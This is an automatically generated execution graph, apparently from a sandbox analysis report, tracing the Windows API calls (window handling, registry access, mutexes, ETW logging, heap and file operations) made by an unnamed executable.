                                                                                                                        execution_graph 40229 4e6650 40230 4e6664 40229->40230 40231 4e665d 40229->40231 40237 4e695a 40230->40237 40233 4f9d9c 6 API calls 40231->40233 40234 4e6676 40231->40234 40233->40234 40235 4f9d9c 6 API calls 40234->40235 40236 4e667d 40235->40236 40238 4e6980 40237->40238 40243 4e6971 40237->40243 40253 4e7be5 40238->40253 40240 4e6985 SetEvent 40241 4e6995 GetLastError 40240->40241 40242 4e69b0 40240->40242 40241->40243 40242->40243 40244 4e69d4 GetMessageW 40242->40244 40249 4f8ab5 186 API calls 40243->40249 40245 4e69be TranslateMessage DispatchMessageW 40244->40245 40246 4e69e6 DestroyWindow 40244->40246 40245->40244 40247 4e6a26 40246->40247 40248 4e69f3 GetLastError 40246->40248 40250 4f9d9c 6 API calls 40247->40250 40251 4e6a00 40248->40251 40249->40247 40252 4e6a2d 40250->40252 40251->40243 40252->40231 40254 4e7bf1 __EH_prolog3 40253->40254 40255 4f9c14 11 API calls 40254->40255 40256 4e7c08 40255->40256 40257 4e7c41 LoadImageW 40256->40257 40260 4e7c15 40256->40260 40258 4e7c5e GetLastError 40257->40258 40259 4e7c7a LoadCursorW RegisterClassW 40257->40259 40258->40260 40261 4e7d37 40259->40261 40262 4e7cc4 GetLastError 40259->40262 40266 4f8ab5 186 API calls 40260->40266 40267 4e7d6d CreateWindowExW 40261->40267 40285 4f8a19 186 API calls 40261->40285 40262->40261 40263 4e7cd1 GetLastError 40262->40263 40264 4e7ce1 40263->40264 40264->40261 40265 4e7ce5 40264->40265 40279 4f8ab5 186 API calls 40265->40279 40284 4e7c3c 40266->40284 40268 4e7d8f GetLastError 40267->40268 40269 4e7da6 ChangeWindowMessageFilterEx 40267->40269 40270 4e7d9c 40268->40270 40271 4e7dba GetLastError 40269->40271 40272 4e7dd1 SetTimer 40269->40272 40270->40269 40280 4e7dc7 40271->40280 40275 4e7df5 40272->40275 40276 4e7de8 GetLastError 40272->40276 40273 4e7d1d 40278 4f9d9c 6 API calls 40273->40278 40274 4e7d16 40303 4e7e94 190 API calls __EH_prolog3 40274->40303 40294 4f8822 40275->40294 40276->40275 40281 4e7d24 40278->40281 40279->40284 40280->40272 40286 4e7d2f 40281->40286 40304 4f9b21 8 API calls 40281->40304 40284->40273 40284->40274 40288 4e7d6a 40285->40288 40286->40240 40288->40267 40290 4e7e2e GetLastError 40292 4e7e3b 40290->40292 40291 4e7e45 ShowWindow SetWindowLongW GetWindowLongW 40291->40284 40293 4e7e6d 40291->40293 40292->40291 40305 4f8bee 40294->40305 40297 4f885d 40300 4f9d9c 6 API calls 40297->40300 40301 4e7e09 UpdateWindow 40300->40301 40301->40290 40301->40291 40303->40273 40304->40286 40326 4fb4dc 40305->40326 40307 4f8bf9 40308 4f9d9c 6 API calls 40307->40308 40309 4f8832 40308->40309 40309->40297 40310 4fc640 40309->40310 40311 4fd0b5 11 API calls 40310->40311 40312 4fc664 40311->40312 40313 4fc66d 40312->40313 40314 4fc676 RegQueryValueExW 40312->40314 40315 4f9d9c 6 API calls 40313->40315 40314->40313 40316 4fc6bc 40315->40316 40317 4f8843 40316->40317 40318 4fc6c2 RegCloseKey 40316->40318 40317->40297 40319 4f8bb3 40317->40319 40318->40317 40320 4f9d9c 6 API calls 40319->40320 40321 4f8bc3 40320->40321 40348 4fb369 40321->40348 40323 4f8bd2 40324 4f9d9c 6 API calls 40323->40324 40325 4f8be6 40324->40325 40325->40297 40337 4fd21f 40326->40337 40328 4fb50c 40330 4f9d9c 6 API calls 40328->40330 40332 4fb55e 40330->40332 40331 4fb52f RegSetKeySecurity 40331->40328 40333 4fb56d 40332->40333 40334 4fb564 LocalFree 40332->40334 40335 4fb57c 40333->40335 40336 4fb573 RegCloseKey 40333->40336 40334->40333 40335->40307 40336->40335 40338 4fd25a GetCurrentProcess IsWow64Process 40337->40338 40339 4fd24a 40337->40339 40340 4fd26f GetLastError 40338->40340 40341 4fd287 RegCreateKeyExW 40338->40341 40339->40338 40343 4fd27c 40340->40343 40341->40343 40344 4f9d9c 6 API calls 40343->40344 40345 4fd2d8 40344->40345 40346 4fd2de RegCloseKey 40345->40346 40347 4fb503 40345->40347 40346->40347 40347->40328 40347->40331 40349 4fd0b5 11 API calls 40348->40349 40350 4fb38b 40349->40350 40351 4fb3bb 40350->40351 40352 4f9d9c 6 API calls 40350->40352 40354 4f9d9c 6 API calls 40351->40354 40353 4fb398 RegSetValueExW 40352->40353 40353->40351 40355 4fb3d0 40354->40355 40356 4eee5d 2 API calls 40355->40356 40357 4fb3d8 40356->40357 40358 4fb3dd RegCloseKey 40357->40358 40359 4fb3e6 40357->40359 40358->40359 40359->40323 39971 53f60e 40030 5501e0 39971->40030 39976 53fbbf 39978 54ea60 4 API calls 39976->39978 39980 53fc0f 39978->39980 39982 53f76d GetLastError 39983 53f778 39982->39983 39983->39976 39984 53f7d3 39983->39984 40066 541dd1 15 API calls 39983->40066 39984->39976 39986 53f808 GetWindowsDirectoryA 39984->39986 40091 53ecc6 _vsnprintf 39984->40091 39989 53f81e 39986->39989 39987 53fba3 40067 5445c1 39987->40067 39992 4fe595 _vsnwprintf 39989->39992 39991 53f801 39991->39986 39991->39989 39993 53fa43 39992->39993 39994 4fe595 _vsnwprintf 39993->39994 40023 54007d 39993->40023 39996 53fa70 39994->39996 39997 4fe595 _vsnwprintf 39996->39997 39996->40023 39998 53fa9d 39997->39998 39999 4fe595 _vsnwprintf 39998->39999 39998->40023 40000 53faca 39999->40000 40001 4fe595 _vsnwprintf 40000->40001 40000->40023 40002 53faf7 40001->40002 40003 4fe595 _vsnwprintf 40002->40003 40002->40023 40004 53fb24 40003->40004 40005 4fe595 _vsnwprintf 40004->40005 40004->40023 40008 53fb51 40005->40008 40006 53fc74 40007 53fca7 40006->40007 40009 53fc91 SetUnhandledExceptionFilter 40006->40009 40079 53f5a0 40007->40079 40008->40006 40012 4fe595 _vsnwprintf 40008->40012 40013 53fb91 40008->40013 40008->40023 40009->40007 40011 53fc18 ExpandEnvironmentStringsW 40014 53fc46 GetTempPathW 40011->40014 40015 53fc29 GetFileAttributesW 40011->40015 40012->40013 40013->40006 40013->40011 40014->40006 40017 53fc52 wcsrchr 40014->40017 40015->40014 40016 53fc34 40015->40016 40016->40006 40016->40014 40017->40006 40019 53fcac 40020 53ff81 GetCurrentProcessId 40019->40020 40022 53ffac 40019->40022 40019->40023 40020->40022 40021 540044 40021->40023 40024 540071 RtlAddVectoredExceptionHandler 40021->40024 40022->40021 40025 53fffe GetLastError 40022->40025 40085 5400cc 40023->40085 40024->40023 40026 4e1d02 23 API calls 40025->40026 40027 540037 40026->40027 40028 54086c 140 API calls 40027->40028 40028->40021 40031 53f632 8 API calls 40030->40031 40032 54290c 40031->40032 40033 54292e 40032->40033 40043 542ae3 40032->40043 40035 542949 GetVersion 40033->40035 40037 542965 40033->40037 40034 54ea60 4 API calls 40036 53f72e 40034->40036 40035->40037 40036->39976 40047 53ed7d 40036->40047 40038 5429e4 40037->40038 40039 542978 GetModuleHandleW 40037->40039 40041 542a2a memset ExpandEnvironmentStringsW 40038->40041 40040 5429cd GetProcAddress 40039->40040 40039->40041 40040->40041 40042 5429dd 40040->40042 40041->40043 40044 542aaa LoadLibraryExW 40041->40044 40042->40041 40043->40034 40045 542ad0 GetProcAddress 40044->40045 40046 542abd FreeLibrary 40044->40046 40045->40043 40046->40043 40092 501150 AllocateAndInitializeSid 40047->40092 40050 53eda7 40055 54ea60 4 API calls 40050->40055 40051 53edac AllocateAndInitializeSid 40051->40050 40052 53edc9 CheckTokenMembership 40051->40052 40053 53ede1 FreeSid 40052->40053 40054 53edde 40052->40054 40053->40050 40054->40053 40056 53edf7 40055->40056 40057 5427a0 40056->40057 40058 541f8c 35 API calls 40057->40058 40059 5427b4 CreateMutexW 40058->40059 40061 5427ee 40059->40061 40062 5427df 40059->40062 40064 542266 3 API calls 40061->40064 40062->40061 40063 5427e5 WaitForSingleObject 40062->40063 40063->40061 40065 53f761 40064->40065 40065->39982 40065->39983 40066->39987 40068 54290c 12 API calls 40067->40068 40069 5445ce 40068->40069 40070 5445d2 GetProcessHeap HeapAlloc 40069->40070 40071 54460b 40069->40071 40072 5445f1 40070->40072 40073 5445e8 40070->40073 40071->39984 40072->40071 40101 542f1b 40072->40101 40116 542d3b 20 API calls __EH_prolog3 40073->40116 40075 5445ef 40075->40072 40080 53f5ac 40079->40080 40081 53f5cd 40080->40081 40082 53f5bd TlsAlloc 40080->40082 40083 53f5d6 TlsAlloc 40081->40083 40084 53f5e6 40081->40084 40082->40081 40082->40084 40083->40084 40084->40019 40086 5400d5 40085->40086 40088 5400e4 40085->40088 40086->40088 40151 540307 63 API calls 40086->40151 40148 5422c0 CloseHandle 40088->40148 40091->39991 40093 5011c2 GetLastError 40092->40093 40094 501195 CheckTokenMembership 40092->40094 40097 5011ca SetLastError 40093->40097 40095 5011aa 40094->40095 40096 5011af GetLastError 40094->40096 40098 5011b7 FreeSid 40095->40098 40096->40098 40099 54ea60 4 API calls 40097->40099 40098->40097 40100 5011df 40099->40100 40100->40050 40100->40051 40103 542f27 40101->40103 40102 543058 40102->40071 40117 544616 22 API calls 40102->40117 40103->40102 40115 5427a0 40 API calls 40103->40115 40104 542f53 40104->40102 40118 542e53 40104->40118 40106 542f70 40107 543046 40106->40107 40109 542f89 GetProcessHeap RtlAllocateHeap 40106->40109 40129 543062 14 API calls 40107->40129 40109->40107 40110 542fa8 memset 40109->40110 40111 542fc4 40110->40111 40111->40107 40112 54303a 40111->40112 40128 542c34 10 API calls __EH_prolog3 40112->40128 40114 543042 40114->40107 40115->40104 40116->40075 40117->40071 40119 542e5f __EH_prolog3 40118->40119 40120 545274 6 API calls 40119->40120 40124 542e97 40120->40124 40121 542f06 40136 541710 40121->40136 40123 542f11 40123->40106 40124->40121 40130 5451d5 40124->40130 40126 542ec3 40126->40121 40127 542ed3 memset 40126->40127 40127->40121 40128->40114 40129->40102 40131 5451e3 40130->40131 40139 542800 40131->40139 40133 545204 40133->40126 40137 541715 GetProcessHeap HeapFree 40136->40137 40138 541726 40136->40138 40137->40138 40138->40123 40140 541f8c 35 API calls 40139->40140 40141 542815 CreateFileMappingW 40140->40141 40143 542266 3 API calls 40141->40143 40144 54284d 40143->40144 40145 542851 40144->40145 40146 54285c GetLastError 40144->40146 40145->40133 40147 5422e0 MapViewOfFile 40145->40147 40146->40145 40147->40133 40149 5422d2 DebugBreak 40148->40149 40150 54010c 40148->40150 40149->40150 40150->39976 40151->40088 40360 4e9210 40362 4e922a 40360->40362 40361 4e9250 40363 4e92a9 40361->40363 40366 4e9259 40361->40366 40362->40361 40365 4f8a19 186 API calls 40362->40365 40375 53e9a2 40363->40375 40365->40361 40367 4f8ab5 186 API calls 40366->40367 40371 4e9282 40367->40371 40368 4f9d9c 6 API calls 40369 4e93d4 40368->40369 40371->40368 40372 4f8a19 186 API calls 40374 4e92fe 40372->40374 40373 4f8a19 186 API calls 40373->40371 40374->40371 40374->40373 40376 4fb3ee 17 API calls 40375->40376 40377 53e9d2 40376->40377 40378 53ea38 40377->40378 40379 53e9df 40377->40379 40382 4f9d9c 6 API calls 40378->40382 40390 53ea52 13 API calls __EH_prolog3 40379->40390 40381 53e9e6 40383 53e9ec 40381->40383 40385 4fb3ee 17 API calls 40381->40385 40384 4e92b4 40382->40384 40383->40378 40384->40372 40384->40374 40386 53ea0b 40385->40386 40386->40378 40387 4f8bb3 15 API calls 40386->40387 40388 53ea1e 40387->40388 40388->40383 40391 53ea52 13 API calls __EH_prolog3 40388->40391 40390->40381 40391->40383 37448 4e7aca 37450 4e7b0e 37448->37450 37454 4e7ae7 37448->37454 37451 4e7b3d NtPowerInformation 37450->37451 37462 4f8a19 37450->37462 37472 4f9ca1 37451->37472 37453 4e7b5c 37453->37454 37459 4e7b85 37453->37459 37479 4f8ab5 37454->37479 37458 4e7b3a 37458->37451 37460 4f8a19 186 API calls 37459->37460 37461 4e7b09 37459->37461 37460->37461 37485 4f9d9c 37461->37485 37463 4f8a25 __EH_prolog3 37462->37463 37469 4f8a32 37463->37469 37493 4f95ca 37463->37493 37464 4f9d9c 6 API calls 37466 4f8aa2 37464->37466 37468 4f8aad 37466->37468 37535 4f9b21 8 API calls 37466->37535 37468->37458 37469->37464 37473 4f9cbb 37472->37473 37478 4f9cee 37472->37478 37474 4f9ccc GetModuleHandleExW 37473->37474 37473->37478 37475 4f9cf4 GetProcAddress 37474->37475 37476 4f9ce1 GetLastError 37474->37476 37475->37476 37477 4f9d08 37475->37477 37476->37478 37477->37478 37478->37453 37480 4f8ada 37479->37480 37481 4f8ac2 37479->37481 37482 4f9d9c 6 API calls 37480->37482 37481->37480 37483 4f8a19 186 API calls 37481->37483 37484 4f8af1 37482->37484 37483->37480 37484->37461 37486 4f9dc8 37485->37486 37487 4f9e3d 37486->37487 37490 4f9e13 EtwEventEnabled 37486->37490 37488 54ea60 4 API calls 37487->37488 37489 4e7bdc 37488->37489 37490->37487 37491 4f9e19 EtwEventWrite 37490->37491 37491->37487 37536 4e1892 37493->37536 37496 4f9768 37497 4f977d 37496->37497 37498 4f9c14 11 API calls 37496->37498 37500 4f9d9c 6 API calls 37497->37500 37498->37497 37499 4f9d9c 6 API calls 37507 4f962b 37499->37507 37501 4f9791 37500->37501 37502 4f979c 37501->37502 37555 4f9b21 8 API calls 37501->37555 37504 4f97b0 37502->37504 37505 4f97a0 GetProcessHeap HeapFree 37502->37505 37540 54ea60 37504->37540 37505->37504 37507->37497 37507->37499 37509 4f96cf GetProcessHeap HeapAlloc 37507->37509 37510 4f96bd GetProcessHeap HeapFree 37507->37510 37508 4f8a60 37508->37469 37517 4e34a0 37508->37517 37511 4f96ea GetProcessHeap HeapFree 37509->37511 37513 4f96fa 37509->37513 37510->37509 37511->37513 37512 4e1892 _vsnwprintf 37512->37513 37513->37507 37513->37512 37514 4f9727 37513->37514 37516 4f9738 37513->37516 37514->37497 37545 4f9c14 37514->37545 37516->37497 37518 4e34bf 37517->37518 37520 4e34d0 37517->37520 37521 4f9d9c 6 API calls 37518->37521 37519 4e3520 GetLastError 37566 4e1d02 37519->37566 37520->37518 37520->37519 37523 4e3587 37521->37523 37525 4e3592 37523->37525 37604 4f9b21 8 API calls 37523->37604 37525->37469 37529 4e3566 37603 4f7def 26 API calls 37529->37603 37531 4e356f 37532 4e359d GetCurrentThreadId 37531->37532 37534 4e3575 37531->37534 37605 4e3685 23 API calls 37532->37605 37534->37518 37535->37468 37537 4e18a1 37536->37537 37538 4e18b1 _vsnwprintf 37537->37538 37539 4e18d0 37537->37539 37538->37539 37539->37496 37539->37507 37541 54ea68 37540->37541 37542 54ea6b 37540->37542 37541->37508 37556 54eb2c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37542->37556 37544 54ec62 37544->37508 37546 4f9c34 37545->37546 37547 4f9c25 37545->37547 37565 4fbb2e 11 API calls 37546->37565 37557 4fcc6a 37547->37557 37551 4f9c49 37553 4f9d9c 6 API calls 37551->37553 37552 4f9c43 37552->37551 37554 4f9c57 37553->37554 37554->37516 37555->37502 37556->37544 37558 4fcc82 37557->37558 37559 4fcc88 37558->37559 37560 4f9d9c 6 API calls 37558->37560 37563 4f9d9c 6 API calls 37559->37563 37561 4fcc98 37560->37561 37562 4f9d9c 6 API calls 37561->37562 37562->37559 37564 4f9c2e 37563->37564 37564->37546 37564->37551 37565->37552 37606 540caa 37566->37606 37569 54086c GetLastError memset 37570 540b2b 37569->37570 37574 5408ff 37569->37574 37571 54ea60 4 API calls 37570->37571 37573 4e355d 37571->37573 37572 540965 37578 5409aa 37572->37578 37656 53edf9 VirtualQuery 37572->37656 37573->37518 37573->37529 37574->37570 37574->37572 37574->37574 37575 540922 GetProcessHeap HeapAlloc 37574->37575 37575->37572 37577 540946 37575->37577 37579 4fe595 _vsnwprintf 37577->37579 37581 540a44 TlsGetValue 37578->37581 37646 54056f 37578->37646 37580 540957 37579->37580 37580->37572 37584 540a54 37581->37584 37583 540978 37583->37578 37588 540997 wcsrchr 37583->37588 37650 5403b6 GetLocalTime SystemTimeToVariantTime 37584->37650 37588->37578 37590 540a23 37658 544bae 25 API calls 37590->37658 37594 540a34 GetProcessHeap HeapFree 37594->37581 37595 540af3 37597 540b05 37595->37597 37598 540af8 37595->37598 37596 540ae3 GetProcessHeap HeapFree 37596->37595 37600 540b0c RaiseException 37597->37600 37601 540b1d SetLastError 37597->37601 37659 540307 63 API calls 37598->37659 37600->37601 37601->37570 37602 540afd ExitProcess 37603->37531 37604->37525 37605->37534 37607 4e1d16 37606->37607 37608 540cce GetLastError 37606->37608 37607->37569 37625 540b44 37608->37625 37611 540dcf SetLastError 37611->37607 37612 540dc6 37612->37611 37613 540d06 FormatMessageW 37614 540d2e 37613->37614 37615 540d8f 37614->37615 37616 540d48 GetProcessHeap HeapAlloc 37614->37616 37617 4e1892 _vsnwprintf 37615->37617 37618 540d68 37616->37618 37623 540d78 37616->37623 37619 540da1 37617->37619 37641 4fe595 37618->37641 37621 540db5 37619->37621 37622 540da5 GetProcessHeap HeapFree 37619->37622 37621->37611 37624 540dbb LocalFree 37621->37624 37622->37621 37623->37615 37624->37611 37645 54f2f8 37625->37645 37627 540b50 TlsGetValue 37628 540b70 EnterCriticalSection 37627->37628 37629 540c9a 37627->37629 37630 540b86 GetProcessHeap HeapAlloc 37628->37630 37631 540bb7 37628->37631 37629->37611 37629->37612 37629->37613 37629->37614 37632 540ba3 37630->37632 37636 540c39 37630->37636 37633 540bc6 GetProcessHeap HeapReAlloc 37631->37633 37634 540bf7 GetProcessHeap RtlAllocateHeap 37631->37634 37632->37634 37633->37636 37637 540be6 37633->37637 37635 540c1b TlsSetValue 37634->37635 37634->37636 37635->37636 37638 540c6f TlsSetValue GetProcessHeap HeapFree 37636->37638 37639 540c4f 37636->37639 37637->37634 37640 540c8d LeaveCriticalSection 37638->37640 37639->37640 37640->37629 37642 4fe5a4 37641->37642 37643 4fe5b4 _vsnwprintf 37642->37643 37644 4fe5d4 37642->37644 37643->37644 37644->37623 37645->37627 37647 540578 37646->37647 37648 54057d 37646->37648 37660 5404a9 memset RegOpenKeyExW 37647->37660 37648->37581 37657 540801 29 API calls 37648->37657 37651 5403f3 37650->37651 37652 54ea60 4 API calls 37651->37652 37653 540405 GetCurrentThreadId 37652->37653 37654 540de1 TlsGetValue 37653->37654 37655 540ab9 37654->37655 37655->37595 37655->37596 37656->37583 37657->37590 37658->37594 37659->37602 37661 540505 RegQueryValueExW 37660->37661 37662 54053b GetEnvironmentVariableW 37660->37662 37663 54052a 37661->37663 37664 54052b RegCloseKey 37661->37664 37665 540556 37662->37665 37666 540561 37662->37666 37663->37664 37664->37662 37664->37665 37670 540407 wcsrchr towlower towlower 37665->37670 37668 54ea60 4 API calls 37666->37668 37669 54056d 37668->37669 37669->37648 37670->37666 40152 4f8cd1 40153 4f8cef 40152->40153 40154 4f8ebc 40153->40154 40157 4f9d9c 6 API calls 40153->40157 40155 4f9d9c 6 API calls 40154->40155 40156 4f8ecc 40155->40156 40158 54ea60 4 API calls 40156->40158 40163 4f8d5a 40157->40163 40159 4f8edb 40158->40159 40160 4f8ee6 40169 54ec64 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 40160->40169 40161 4f8dab wcschr 40161->40163 40163->40154 40163->40160 40163->40161 40165 4f8e41 GetFileAttributesW 40163->40165 40166 4f8e57 CreateDirectoryW 40163->40166 40164 4f8eeb 40165->40163 40165->40166 40167 4f8eaf GetLastError 40166->40167 40168 4f8e6a GetFileAttributesW 40166->40168 40167->40154 40168->40163 40168->40167 40169->40164 37699 4ed2e0 37700 4ed2f1 37699->37700 37701 4ed3aa 37700->37701 37702 4f8ab5 186 API calls 37700->37702 37703 4f9d9c 6 API calls 37701->37703 37702->37701 37704 4ed3b1 37703->37704 37671 545a90 37673 545ab3 37671->37673 37675 545b3b 37671->37675 37672 54ea60 4 API calls 37674 545b52 37672->37674 37673->37675 37677 542b70 37673->37677 37675->37672 37682 545274 37677->37682 37680 542b90 37680->37675 37681 545274 6 API calls 37681->37680 37683 5452b0 37682->37683 37684 545283 GetProcessHeap RtlAllocateHeap 37682->37684 37686 5452b8 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 37683->37686 37687 542b83 37683->37687 37684->37687 37688 5452df 37686->37688 37687->37680 37687->37681 37688->37687 39921 547280 39922 547290 39921->39922 39923 5472a2 39921->39923 39927 5473aa 39922->39927 39928 5473bb 39927->39928 39929 5473cc 39928->39929 39952 547311 11 API calls 39928->39952 39931 547297 39929->39931 39932 5473d0 memset 39929->39932 39933 547803 39931->39933 39932->39931 39953 54f2f8 39933->39953 39935 54780f _wfopen 39936 547a07 39935->39936 39937 547848 GetProcessHeap HeapAlloc 39935->39937 39955 547a30 19 API calls 39936->39955 39946 54786d 39937->39946 39939 547a13 39939->39923 39940 547876 fgetws 39941 547a00 39940->39941 39940->39946 39941->39936 39942 5478b2 GetProcessHeap HeapReAlloc 39942->39936 39943 5478d9 fgetws 39942->39943 39945 547903 feof 39943->39945 39943->39946 39944 54793a iswctype 39944->39946 39945->39936 39945->39946 39946->39936 39946->39940 39946->39942 39946->39944 39947 5479cc swscanf_s 39946->39947 39948 547966 GetProcessHeap HeapFree 39946->39948 39949 547988 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 39946->39949 39950 547979 GetProcessHeap HeapFree 39946->39950 39954 5475ab 52 API calls 39946->39954 39947->39936 39947->39946 39948->39946 39949->39936 39949->39946 39950->39949 39952->39928 39953->39935 39954->39946 39955->39939 40392 4e6690 GetWindowLongW 40393 4e66b8 DefWindowProcW 40392->40393 40394 4e66a4 40392->40394 40397 4e75c4 40394->40397 40398 4e7826 40397->40398 40399 4e75e3 40397->40399 40400 4e7833 40398->40400 40410 4e7a81 40398->40410 40401 4e778a 40399->40401 40402 4e75e9 40399->40402 40403 4e783c 40400->40403 40412 4e79af 40400->40412 40407 4e784a DefWindowProcW 40401->40407 40417 4e77f2 40401->40417 40430 4e77aa 40401->40430 40404 4e75f2 40402->40404 40428 4e7733 40402->40428 40406 4e7845 40403->40406 40415 4e78f4 40403->40415 40405 4e75fb 40404->40405 40413 4e76f3 40404->40413 40408 4e7607 40405->40408 40422 4e76ae 40405->40422 40406->40407 40419 4e785f 40406->40419 40452 4e66b4 40407->40452 40408->40407 40423 4e7613 40408->40423 40409 4e7ab9 PostQuitMessage 40409->40452 40410->40409 40426 4f8a19 186 API calls 40410->40426 40411 4e79e4 ShutdownBlockReasonCreate 40416 4e7a31 GetLastError 40411->40416 40434 4e79f4 40411->40434 40412->40411 40427 4f8a19 186 API calls 40412->40427 40431 4f8a19 186 API calls 40413->40431 40413->40452 40414 4e7929 ShutdownBlockReasonDestroy 40420 4e7974 GetLastError 40414->40420 40440 4e7936 40414->40440 40415->40414 40432 4f8a19 186 API calls 40415->40432 40446 4e797e 40416->40446 40417->40407 40436 4f8a19 186 API calls 40417->40436 40418 4e7891 40418->40430 40448 4e7690 40418->40448 40419->40418 40438 4f8a19 186 API calls 40419->40438 40420->40446 40421 4e76e1 40453 4f8877 40421->40453 40422->40421 40441 4f8a19 186 API calls 40422->40441 40424 4e7646 40423->40424 40443 4f8a19 186 API calls 40423->40443 40444 4e7656 40424->40444 40424->40448 40429 4e7ab6 40426->40429 40433 4e79e1 40427->40433 40435 4f8a19 186 API calls 40428->40435 40428->40452 40429->40409 40437 4f8a19 186 API calls 40430->40437 40430->40452 40431->40452 40439 4e7926 40432->40439 40433->40411 40445 4f8a19 186 API calls 40434->40445 40434->40452 40435->40452 40442 4e781e 40436->40442 40437->40452 40438->40418 40439->40414 40447 4f8a19 186 API calls 40440->40447 40440->40452 40441->40421 40442->40407 40443->40424 40451 4f8a19 186 API calls 40444->40451 40444->40452 40445->40452 40449 4f8a19 186 API calls 40446->40449 40446->40452 40447->40452 40450 4f8a19 186 API calls 40448->40450 40448->40452 40449->40452 40450->40452 40451->40452 40454 4f8bee 14 API calls 40453->40454 40455 4f8891 40454->40455 40456 4fc640 13 API calls 40455->40456 40465 4f8897 40455->40465 40457 4f88ab 40456->40457 40459 4f88c8 40457->40459 40460 4fb3ee 17 API calls 40457->40460 40457->40465 40458 4f9d9c 6 API calls 40462 4f8909 40458->40462 40461 4fccb5 6 API calls 40459->40461 40459->40465 40460->40459 40463 4f88df 40461->40463 40462->40452 40464 4f8bb3 15 API calls 40463->40464 40463->40465 40464->40465 40465->40458 39956 546340 39959 5462c0 39956->39959 39960 5462e6 39959->39960 39963 546315 39960->39963 39964 54632a 39960->39964 39965 545479 39960->39965 39962 545479 6 API calls 39962->39964 39963->39962 39963->39964 39966 54540d 5 API calls 39965->39966 39967 54548a 39966->39967 39968 5454aa 39967->39968 39970 542370 WriteFile 39967->39970 39968->39963 39970->39968 37705 4e2f00 GetProcessHeap HeapAlloc 37706 4e2f59 UuidCreate 37705->37706 37707 4e2f8d 37705->37707 37859 4fcd57 memset SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 37706->37859 37709 4e2fbe 37707->37709 37710 4e2fdd 37707->37710 37757 4e2f9b 37707->37757 37712 4f9c14 11 API calls 37709->37712 37769 4fb2c2 37710->37769 37714 4e2fc9 37712->37714 37713 4e2fe5 37715 4f9d9c 6 API calls 37713->37715 37717 4e30a4 37714->37717 37718 4e3045 37714->37718 37714->37757 37719 4e2ff9 37715->37719 37716 4f9d9c 6 API calls 37720 4e31e7 37716->37720 37721 4e30d9 memset 37717->37721 37722 4e30b4 memset 37717->37722 37723 4f9d9c 6 API calls 37718->37723 37719->37757 37780 4fb0b6 37719->37780 37724 4e31f2 37720->37724 37887 4f9b21 8 API calls 37720->37887 37789 4e23d2 37721->37789 37725 4e30cb 37722->37725 37726 4e304f 37723->37726 37730 4e31fc GetProcessHeap HeapFree 37724->37730 37731 4e320b 37724->37731 37877 4e258d 37725->37877 37875 4f9975 12 API calls 37726->37875 37730->37731 37735 4e3222 37731->37735 37736 4e3213 GetProcessHeap HeapFree 37731->37736 37737 4e322a GetProcessHeap HeapFree 37735->37737 37738 4e3239 37735->37738 37736->37735 37737->37738 37741 4e3250 37738->37741 37742 4e3241 GetProcessHeap HeapFree 37738->37742 37740 4e305d 37746 4e3079 37740->37746 37747 4e3072 37740->37747 37740->37757 37744 4e3254 GetProcessHeap HeapFree 37741->37744 37745 4e3263 37741->37745 37742->37741 37744->37745 37750 54ea60 4 API calls 37745->37750 37752 4e217c 22 API calls 37746->37752 37876 4e1fc3 20 API calls 37747->37876 37754 4e3276 37750->37754 37755 4e3077 37752->37755 37755->37757 37758 4e308e GetProcessHeap HeapFree 37755->37758 37759 4e30a2 37755->37759 37757->37716 37758->37759 37759->37717 37760 4e3168 37762 4f9c14 11 API calls 37760->37762 37763 4e317a 37762->37763 37763->37757 37843 4f8b23 37763->37843 37768 4eee5d 2 API calls 37768->37757 37888 4fd14e 37769->37888 37772 4fb315 RegSetKeySecurity 37774 4fb2f2 37772->37774 37773 4f9d9c 6 API calls 37775 4fb344 37773->37775 37774->37773 37776 4fb34a LocalFree 37775->37776 37777 4fb353 37775->37777 37776->37777 37778 4fb359 RegCloseKey 37777->37778 37779 4fb362 37777->37779 37778->37779 37779->37713 37899 4fd0b5 GetCurrentProcess IsWow64Process 37780->37899 37783 4fb0ec RegQueryValueExW 37784 4fb0e3 37783->37784 37785 4f9d9c 6 API calls 37784->37785 37786 4fb132 37785->37786 37787 4fb138 RegCloseKey 37786->37787 37788 4e3009 37786->37788 37787->37788 37788->37717 37788->37757 37860 4fb1d4 37788->37860 37790 4e23ee 37789->37790 37790->37790 37791 4e258d 2 API calls 37790->37791 37792 4e2414 37791->37792 37792->37757 37793 4e217c 37792->37793 37908 4e2639 strchr 37793->37908 37795 4e23cb 37824 4f986b 37795->37824 37797 4e229e 37797->37795 37799 4e22a9 strrchr 37797->37799 37798 4e21d6 37800 4e21de 37798->37800 37801 4e220d 37798->37801 37799->37795 37802 4e22bc _set_errno strtol 37799->37802 37800->37795 37916 54ed1e GetProcessHeap HeapAlloc __EH_prolog3_catch 37800->37916 37918 54ed1e GetProcessHeap HeapAlloc __EH_prolog3_catch 37801->37918 37804 4e22e0 37802->37804 37805 4e22f1 _errno 37802->37805 37804->37795 37804->37805 37805->37795 37806 4e2300 37805->37806 37809 4e2338 37806->37809 37810 4e2309 37806->37810 37807 4e221c 37812 4e220b 37807->37812 37919 4e1ee1 6 API calls 37807->37919 37922 54ed1e GetProcessHeap HeapAlloc __EH_prolog3_catch 37809->37922 37810->37795 37920 54ed1e GetProcessHeap HeapAlloc __EH_prolog3_catch 37810->37920 37812->37795 37816 4e223f strncpy_s 37812->37816 37814 4e21f6 37814->37812 37917 4e1f38 6 API calls 37814->37917 37816->37795 37817 4e2347 37823 4e2336 37817->37823 37923 4e1ee1 6 API calls 37817->37923 37819 4e2321 37819->37823 37921 4e1f38 6 API calls 37819->37921 37821 4e2366 strncpy_s 37821->37795 37823->37795 37823->37821 37825 4f9892 37824->37825 37827 4f9881 37824->37827 37825->37827 37924 4fcf9e 6 API calls 37825->37924 37828 4f9d9c 6 API calls 37827->37828 37830 4f9958 37828->37830 37829 4f98a4 37829->37827 37925 4fcf9e 6 API calls 37829->37925 37832 4e3143 37830->37832 37833 4f995c GetProcessHeap HeapFree 37830->37833 37832->37757 37832->37760 37883 4f9b21 8 API calls 37832->37883 37833->37832 37834 4f98c4 37834->37827 37926 4fcfdc 6 API calls 37834->37926 37836 4f98e0 37836->37827 37927 4fd03c 6 API calls 37836->37927 37838 4f98f5 37838->37827 37839 4f98fb GetProcessHeap HeapAlloc 37838->37839 37840 4f991a MultiByteToWideChar 37839->37840 